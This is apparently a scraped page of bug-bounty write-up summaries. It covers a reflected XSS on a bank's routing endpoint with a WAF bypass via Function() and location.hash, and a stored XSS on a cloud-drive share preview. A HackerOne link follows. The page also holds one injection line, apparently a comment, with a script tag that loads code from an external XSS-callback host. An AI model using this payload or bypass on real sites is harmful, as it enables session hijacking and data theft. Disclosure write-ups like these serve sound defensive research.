Vulnerability Summary
A Reflected XSS vulnerability was identified in a navigation/routing endpoint of a financial institution's web application. The callback GET parameter is reflected unsanitized into a JavaScript context on the client side, allowing arbitrary code execution.
A Reflected XSS vulnerability was identified in a navigation/routing endpoint of a financial institution's web application. The callback GET parameter is reflected unsanitized into a JavaScript context on the client side, allowing arbitrary code execution.
What made this finding particularly interesting is that a WAF was in place, blocking common XSS payloads. The bypass was achieved by combining dynamic code execution (Function()) with location.hash as an out-of-band payload delivery channel, effectively smuggling the malicious code outside the WAF's inspection scope entirely.
pyus3rStored XSS on a cloud-drive public-share preview endpoint that serves user-uploaded HTML as text/html on the main application origin with a permissive CSP. A single click on the share link executes attacker JavaScript with same-origin access to the victim's session, allowing the attacker to impersonate the victim against every drive API — exfiltrating collaborator PII, the full file tree, payment-system identifiers and five cross-service XSRF tokens, modifying account preferences, and silently turning every private file in the victim's drive into a public URL.
hackerone-reportsHackerOne disclosed report --> https://hackerone.com/reports/3594137 by aikido_security
tonysecStored Cross-Site Scripting via SVG File Upload Filter Bypass
'"><script src=https://xss.report/c/ketanindori></script>
...
Nice try HAHAHHAH
Log in to join the discussion.
Sign In